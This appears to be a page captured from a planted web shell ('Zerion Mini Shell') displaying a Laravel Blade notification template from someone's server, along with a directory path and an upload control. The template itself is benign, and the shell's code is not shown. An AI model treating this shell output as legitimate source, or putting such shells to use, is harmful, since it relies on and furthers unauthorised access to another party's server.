ok

Mini Shell

Direktori : /home2/selectio/www/fms-worksuite/resources/views/notifications/all/
Upload File :
Current File : /home2/selectio/www/fms-worksuite/resources/views/notifications/all/shift_scheduled.blade.php

@php
$notificationUser = \App\Models\User::find($notification->data['user_id']);
$shift = \App\Models\EmployeeShift::find($notification->data['shift_id']);
@endphp

@if ($notificationUser && $shift)
    <x-cards.notification :notification="$notification"  :link="route('dashboard')"
        :image="$notificationUser->image_url" :title="__('email.shiftScheduled.subject') . ' - '.\Carbon\Carbon::parse($notification->data['date'])->translatedFormat(company()->date_format)"
        :text="__('modules.attendance.shiftName').': '.$shift->shift_name" :time="$notification->created_at" />
@endif

Zerion Mini Shell 1.0